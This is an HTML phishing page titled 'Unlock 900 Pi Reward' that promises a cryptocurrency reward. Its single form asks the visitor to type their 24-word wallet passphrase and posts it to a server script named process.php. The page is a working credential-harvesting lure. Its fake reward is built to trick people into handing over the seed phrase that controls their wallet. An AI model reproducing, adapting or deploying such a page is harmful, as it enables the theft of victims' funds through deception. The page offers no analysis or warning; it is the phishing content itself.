<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Unlock 900 Pi Reward</title>
    <style>
    
       
 
            
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            background-color: #ffffff;
            width: 100%;
            height: 100vph;
            background-image: url('Back.jpg');
           // background-repeat: no-repeat;
            background-size: 100%;
            //border: 1px solid red;
          
        }
    
        .container {
            width: 80%;
            margin: auto;
            padding: 20px;
            border: 1px solid #ccc;
            border-radius: 10px;
            background-color: #f9f9f9;
            margin-top: 50px;
        }
        textarea {
            width: 90%;
            height: 100px;
            margin-bottom: 10px;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .btn {
            background-color: #6a0dad;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .error {
            color: red;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Unlock 900 Pi Reward</h2>
        <form action="process.php" method="post">
            <textarea name="passphrase" placeholder="Enter your 24-word passphrase here to claim reward" required></textarea><br>
            <button type="submit" class="btn">Unlock with passphrase</button>
        </form>
    </div>
</body>
</html>

